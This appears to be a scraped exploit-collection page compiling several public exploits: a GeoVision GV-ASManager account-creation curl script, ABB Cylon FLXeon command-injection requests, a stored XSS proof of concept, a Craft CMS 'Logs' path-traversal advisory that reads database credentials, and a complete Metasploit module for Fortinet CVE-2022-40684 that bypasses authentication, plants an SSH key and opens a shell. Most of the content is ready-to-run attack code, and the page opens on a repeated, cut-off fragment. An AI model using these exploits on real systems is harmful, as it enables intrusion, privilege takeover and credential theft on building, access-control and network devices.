https://www.cve.org/CVERecord?id=CVE-2024-48841 21.04.2024 -- $ cat project P R O J E C T .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' '` |____ ░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl -k -X PUT "https://7.3.3.1/api/users/password" \ > -H "Cookie: user_sid=xxx" \ > -H "Content-Type: application/json" \ > --data '{"oldPassword":"KAKA","newPassword":"ZULU`sleep 7`"}'
HireHackking

GeoVision GV-ASManager 6.1.0.0 - Broken Access Control

HACKER · %s · %s

# Exploit Title: Broken Access Control in GeoVision GV-ASManager # Google Dork: inurl:"ASWeb/Login" # Date: 02-FEB-2025 # Exploit Author: Giorgi Dograshvili [DRAGOWN] # Vendor Homepage: https://www.geovision.com.tw/ # Software Link: https://www.geovision.com.tw/download/product/ # Version: 6.1.0.0 or less # Tested on: Windows 10 | Kali Linux # CVE : CVE-2024-56898 # PoC: https://github.com/DRAGOWN/CVE-2024-56898 Broken access control vulnerability in Geovision GV-ASManager web application with version v6.1.0.0 or less. Requirements To perform successful attack an attacker requires: - GeoVision ASManager version 6.1.0.0 or less - Network access to the GV-ASManager web application (there are cases when there are public access) - Access to Guest account (enabled by default), or any low privilege account (Username: Guest; Password: <blank>) Impact The vulnerability can be leveraged to perform the following unauthorized actions: A low privilege account which isn't authorized to manage accounts is able to: - Enable and disable any account. - Create new accounts. - Modify privileges of any account. - Listing accounts and their information. After the escalation of the privileges, an attacker will be able to: - Access the resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc. - Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc. - Disrupt and disconnect services such as monitoring cameras, access controls. - Clone and duplicate access control data for further attack scenarios. - Perform CVE-2024-56902 attack to retrieve cleartext password that can be reused in other digital assets of the organization. cURL script: curl --path-as-is -i -s -k -X $'POST' \ -H $'Host: [SET-TARGET]' -H $'Sec-Ch-Ua: \"Not?A_Brand\";v=\"99\", \"Chromium\";v=\"130\"' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H $'Accept-Language: en-US,en;q=0.9' -H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' -H $'Sec-Fetch-Site: cross-site' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Dest: document' -H $'Accept-Encoding: gzip, deflate, br' -H $'Priority: u=0, i' -H $'Connection: keep-alive' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 111' \ -b $'[SET-COOKIE - WRITE WHAT IS AFTER "Cookie:"]' \ --data-binary $'action=UA_SetCreateAccount&id=[SET-USERNAME]&password=[SET-PASSWORD]&email=[SET-MAIL]&level=[SET-PRIVILEGE 1-STANDARD USER/2-ADMINISTRATOR]' \ $'[SET-TARGET]/ASWeb/bin/ASWebCommon.srf' After a successful attack, you will get access to: - ASWeb - Access & Security Management - TAWeb - Time and Attendance Management - VMWeb - Visitor Management - ASManager - Access & Security Management software in OS
HireHackking

ABB Cylon FLXeon 9.3.4 - Remote Code Execution (Authenticated)

HACKER · %s · %s

# Exploit Title: ABB Cylon FLXeon 9.3.4 - Remote Code Execution (Authenticated) # Vendor: ABB Ltd. # Product web page: https://www.global.abb # Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series) CBX Series (FLX Series) CBT Series CBV Series Firmware: <=9.3.4 Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™ building management solutions. ABB BACnet controllers are designed for intelligent control of HVAC equipment such as central plant, boilers, chillers, cooling towers, heat pump systems, air handling units (constant volume, variable air volume, and multi-zone), rooftop units, electrical systems such as lighting control, variable frequency drives and metering. The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented connectivity and open integration for your building automation systems. It's scalable, and modular, allowing you to control a diverse range of HVAC functions. Desc: The ABB Cylon FLXeon BACnet controller is vulnerable to authenticated remote root code execution via the /api/timeConfig endpoint. An attacker with valid credentials can inject arbitrary system commands by manipulating parameters such as tz, timeServerYN, and multiple timeDate fields. The vulnerability exists due to improper input validation in timeConfig.js, where user-supplied data is executed via ChildProcess.exec() without adequate sanitization. Tested on: Linux Kernel 5.4.27 Linux Kernel 4.15.13 NodeJS/8.4.0 Express Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2025-5910 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5910.php CVE ID: CVE-2024-48841 CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48841 21.04.2024 -- $ cat project P R O J E C T .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' '` |____ ░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl -k -X PUT "https://7.3.3.1/api/timeConfig" \ > -H "Cookie: user_sid=xxx" \ > -H "Content-Type: application/json" \ > -d '{"timeConfig":{"timeDate":{\ > "yy":"`sleep 17`",\ > "mm":"`sleep 17`",\ > "dd":"`sleep 17`",\ > "h":"`sleep 17`",\ > "m":"`sleep 17`",\ > "s":"`sleep 17`"},\ > "tz":"`sleep 17`",\ > "tzList":[],\ > "timeServerYN":"`sleep 17`",\ > "timeServer":"1.1.1.1",\ > "timeServerSync":false}}'
HireHackking

Garage Management System 1.0 (categoriesName) - Stored XSS

HACKER · %s · %s

# Exploit Title: Garage Management System 1.0 (categoriesName) - Stored XSS # Date: 18-09-2022 # Exploit Author: Sam Wallace, SC # Software Link: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2022-41358 Summary: Garage Management System utilizes client side validation to prevent XSS. Using burp, a request can be modified and replayed to the server bypassing this validation which creates an avenue for XSS. Parameter: categoriesName URI: /garage/php_action/createCategories.php POC: POST /garage/php_action/createCategories.php HTTP/1.1 Host: 10.24.0.69 Content-Length: 367 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://10.24.0.69 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqKDsN4gmatTEEkhS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://10.24.0.69/garage/add-category.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=gbklvcv3vvv987636urv0gg53u Connection: close ------WebKitFormBoundaryqKDsN4gmatTEEkhS Content-Disposition: form-data; name="categoriesName" <script>alert(1)</script> ------WebKitFormBoundaryqKDsN4gmatTEEkhS Content-Disposition: form-data; name="categoriesStatus" 1 ------WebKitFormBoundaryqKDsN4gmatTEEkhS Content-Disposition: form-data; name="create" ------WebKitFormBoundaryqKDsN4gmatTEEkhS--
HireHackking

Ethercreative Logs 3.0.3 - Path Traversal

HACKER · %s · %s

# Exploit Title: Ethercreative Logs 3.0.3 - Path Traversal # Date: 2022.01.26 # Exploit Author: Steffen Rogge, SC # Vendor Homepage: https://github.com/ethercreative/logs # Software Link: https://plugins.craftcms.com/logs # Version: <=3.0.3 # Tested on: Linux # CVE : CVE-2022-23409 product: Ethercreative Logs plugin for Craft CMS fixed version: >=3.0.4 impact: Medium found: 2021-07-06 SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "A quick and dirty way to access your logs from inside the CP" As found on the plugin store page: https://plugins.craftcms.com/logs Active Installs 4,093 (as of 2021-07-07) Business recommendation: ------------------------ The vendor provides a patched version v3.0.4 which should be installed immediately. Vulnerability overview/description: ----------------------------------- 1) Authenticated Path Traversal (CVE-2022-23409) The plugin "Logs" provides a functionality to read log files of the Craft CMS system inside the backend of the CMS. As the requested logfile is not properly validated, an attacker is able to request arbitrary files from the underlying file system with the permissions of the web service user. Proof of concept: ----------------- 1) Authenticated Path Traversal (CVE-2022-23409) As the plugin is installed as an administrator of the system and the function is only accessible after being logged in as an admin, an attacker needs to be authenticated as an administrator in the backend in order to extract the needed "{MD5}_identity" cookie for the crafted request. The vulnerable endpoint is provided by the plugin under the following path: https://vulnerablesite.com/index.php/admin/actions/logs/logs/stream The vulnerable controller for that endpoint can be found here: https://github.com/ethercreative/logs/blob/master/src/Controller.php The function "actionStream()" provides an endpoint for the Craft CMS and does not validate input values before file content is being read by the function "file_get_contents". public function actionStream () { $logsDir = \Craft::getAlias('@storage/logs'); $logFile = \Craft::$app->request->getParam('log'); $currentLog = \Craft::$app->request->get('log', $logFile); $log = file_get_contents($logsDir . '/' . $currentLog); exit($log); } A crafted GET parameter with the name "log" can be used to access files on the underlying filesystem with rights as the user executing the web server. In most cases this will be the user "www-data". In order to read the file ".env" or ".env.php" which contains the environment configuration and as such also the database credentials, the following request can be used: GET /admin/actions/logs/logs/stream?log=../../.env HTTP/1.1 Host: <host> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 Connection: close Cookie: 1031b8c41dfff97a311a7ac99863bdc5_identity=<identity_cookie>; The response then discloses the file content of the file ".env": HTTP/1.1 200 OK Date: Thu, 07 Jul 2021 10:08:52 GMT Server: nginx Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: CraftSessionId=2uisculfj8t9q1tnbiukl6ogjf; path=/; secure; HttpOnly Content-Length: 1600 Connection: close [...] $craftEnvVars = [ 'DB_DRIVER' => 'mysql', 'DB_SERVER' => '********', 'DB_USER' => '********', 'DB_PASSWORD' => '********', 'DB_DATABASE' => '********', 'DB_SCHEMA' => 'public', 'DB_TABLE_PREFIX' => '', 'DB_PORT' => '********', 'SECURITY_KEY' => '********', [...] Vulnerable / tested versions: ----------------------------- The following version has been tested which was the latest version available at the time of the test: * Version 3.0.3 released on November 25, 2019 Distributed through the Craft Plugin Store https://plugins.craftcms.com/logs Vendor contact timeline: ------------------------ 2021-07-07: Contacting vendor through dev@ethercreative.co.uk 2021-07-08: Response from vendor, no encryption available but vendor accepted to be responsible for any risks involved with plaintext communication 2021-07-08: Advisory was sent to vendor unencrypted 2021-07-09: Vendor released a patch for this vulnerability with version 3.0.4 (https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4) 2021-07-12: Updated Plugin has been tested on an up-to-date CraftCMS installation (CraftCMS 3.7.0, PHP 8, MySQL 8, Logs Plugin 3.0.4) 2022-01-24: Release of security advisory Solution: --------- The vendor released a patched version 3.0.4 or higher which can be retrieved from their website/github: https://plugins.craftcms.com/logs https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4 Workaround: ----------- Uninstall/Disable the plugin and access the Craft CMS logs via SSH or other services. Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Steffen Rogge / @2022
HireHackking
# Exploit Title: Fortinet FortiOS, FortiProxy, and FortiSwitchManager 7.2.0 - Authentication bypass # Date: 2022-10-10 # Exploit Author: Zach Hanley, SC # Vendor Homepage: https://www.fortinet.com # Version: 7.0.0 # Tested on: Linux # CVE : CVE-2022-40684 ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::SSH prepend Msf::Exploit::Remote::AutoCheck attr_accessor :ssh_socket def initialize(info = {}) super( update_info( info, 'Name' => 'Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.', 'Description' => %q{ This module exploits an authentication bypass vulnerability in the Fortinet FortiOS, FortiProxy, and FortiSwitchManager API to gain access to a chosen account. And then add a SSH key to the authorized_keys file of the chosen account, allowing to login to the system with the chosen account. Successful exploitation results in remote code execution. }, 'Author' => [ 'Heyder Andrade <@HeyderAndrade>', # Metasploit module 'Zach Hanley <@hacks_zach>', # PoC ], 'References' => [ ['CVE', '2022-40684'], ['URL', 'https://www.fortiguard.com/psirt/FG-IR-22-377'], ['URL', 'https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684'], ], 'License' => MSF_LICENSE, 'DisclosureDate' => '2022-10-10', # Vendor advisory 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD], 'Privileged' => true, 'Targets' => [ [ 'FortiOS', { 'DefaultOptions' => { 'PAYLOAD' => 'generic/ssh/interact' }, 'Payload' => { 'Compat' => { 'PayloadType' => 'ssh_interact' } } } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK # SSH key is added to authorized_keys file ] } ) ) register_options( [ OptString.new('TARGETURI', [true, 'The base path to the Fortinet CMDB API', '/api/v2/cmdb/']), OptString.new('USERNAME', [false, 'Target username (Default: auto-detect)', nil]), OptString.new('PRIVATE_KEY', [false, 'SSH private key file path', nil]), OptString.new('KEY_PASS', [false, 'SSH private key password', nil]), OptString.new('SSH_RPORT', [true, 'SSH port to connect to', 22]), OptBool.new('PREFER_ADMIN', [false, 'Prefer to use the admin user if one is detected', true]) ] ) end def username if datastore['USERNAME'] @username ||= datastore['USERNAME'] else @username ||= detect_username end end def ssh_rport datastore['SSH_RPORT'] end def current_keys @current_keys ||= read_keys end def ssh_keygen # ssh-keygen -t rsa -m PEM -f `openssl rand -hex 8` if datastore['PRIVATE_KEY'] @ssh_keygen ||= Net::SSH::KeyFactory.load_data_private_key( File.read(datastore['PRIVATE_KEY']), datastore['KEY_PASS'], datastore['PRIVATE_KEY'] ) else @ssh_keygen ||= OpenSSL::PKey::EC.generate('prime256v1') end end def ssh_private_key ssh_keygen.to_pem end def ssh_pubkey Rex::Text.encode_base64(ssh_keygen.public_key.to_blob) end def authorized_keys pubkey = Rex::Text.encode_base64(ssh_keygen.public_key.to_blob) "#{ssh_keygen.ssh_type} #{pubkey} #{username}@localhost" end def fortinet_request(params = {}) send_request_cgi( { 'ctype' => 'application/json', 'agent' => 'Report Runner', 'headers' => { 'Forwarded' => "for=\"[127.0.0.1]:#{rand(1024..65535)}\";by=\"[127.0.0.1]:#{rand(1024..65535)}\"" } }.merge(params) ) end def check vprint_status("Checking #{datastore['RHOST']}:#{datastore['RPORT']}") # a normal request to the API should return a 401 res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, Rex::Text.rand_text_alpha_lower(6)), 'ctype' => 'application/json' }) return CheckCode::Unknown('Target did not respond to check.') unless res return CheckCode::Safe('Target seems not affected by this vulnerability.') unless res.code == 401 # Trying to bypasss the authentication and get the sshkey from the current targeted user it should return a 200 if vulnerable res = fortinet_request({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/system/status') }) return CheckCode::Safe unless res&.code == 200 version = res.get_json_document['version'] print_good("Target is running the version #{version}, which is vulnerable.") Socket.tcp(rhost, ssh_rport, connect_timeout: datastore['SSH_TIMEOUT']) { |sock| return CheckCode::Safe('However SSH is not open, so adding a ssh key wouldn\t give you access to the host.') unless sock } CheckCode::Vulnerable('And SSH is running which makes it exploitable.') end def cleanup return unless ssh_socket # it assumes our key is the last one and set it to a random text. The API didn't respond to DELETE method data = { "ssh-public-key#{current_keys.empty? ? '1' : current_keys.size}" => '""' } fortinet_request({ 'method' => 'PUT', 'uri' => normalize_uri(target_uri.path, '/system/admin/', username), 'data' => data.to_json }) end def detect_username vprint_status('User auto-detection...') res = fortinet_request( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/system/admin') ) users = res.get_json_document['results'].collect { |e| e['name'] if (e['accprofile'] == 'super_admin' && e['trusthost1'] == '0.0.0.0 0.0.0.0') }.compact # we prefer to use admin, but if it doesn't exist we chose a random one. if datastore['PREFER_ADMIN'] vprint_status("PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, but if it isn't found we will pick a random one.") users.include?('admin') ? 'admin' : users.sample else vprint_status("PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, we will get a random that is not the admin.") (users - ['admin']).sample end end def add_ssh_key if current_keys.include?(authorized_keys) # then we'll remove that on cleanup print_good('Your key is already in the authorized_keys file') return end vprint_status('Adding SSH key to authorized_keys file') # Adding the SSH key as the last entry in the authorized_keys file keystoadd = current_keys.first(2) + [authorized_keys] data = keystoadd.map.with_index { |key, idx| ["ssh-public-key#{idx + 1}", "\"#{key}\""] }.to_h res = fortinet_request({ 'method' => 'PUT', 'uri' => normalize_uri(target_uri.path, '/system/admin/', username), 'data' => data.to_json }) fail_with(Failure::UnexpectedReply, 'Failed to add SSH key to authorized_keys file.') unless res&.code == 500 body = res.get_json_document fail_with(Failure::UnexpectedReply, 'Unexpected reponse from the server after adding the key.') unless body.key?('cli_error') && body['cli_error'] =~ /SSH key is good/ end def read_keys vprint_status('Reading SSH key from authorized_keys file') res = fortinet_request({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/system/admin/', username) }) fail_with(Failure::UnexpectedReply, 'Failed read current SSH keys') unless res&.code == 200 result = res.get_json_document['results'].first ['ssh-public-key1', 'ssh-public-key2', 'ssh-public-key3'].map do |key| result[key].gsub('"', '') unless result[key].empty? end.compact end def do_login(ssh_options) # ensure we don't have a stale socket hanging around ssh_options[:proxy].proxies = nil if ssh_options[:proxy] begin ::Timeout.timeout(datastore['SSH_TIMEOUT']) do self.ssh_socket = Net::SSH.start(rhost, username, ssh_options) end rescue Rex::ConnectionError fail_with(Failure::Unreachable, 'Disconnected during negotiation') rescue Net::SSH::Disconnect, ::EOFError fail_with(Failure::Disconnected, 'Timed out during negotiation') rescue Net::SSH::AuthenticationFailed fail_with(Failure::NoAccess, 'Failed authentication') rescue Net::SSH::Exception => e fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}") end fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket end def exploit print_status("Executing exploit on #{datastore['RHOST']}:#{datastore['RPORT']} target user: #{username}") add_ssh_key vprint_status('Establishing SSH connection') ssh_options = ssh_client_defaults.merge({ auth_methods: ['publickey'], key_data: [ ssh_private_key ], port: ssh_rport }) ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG'] do_login(ssh_options) handler(ssh_socket) end end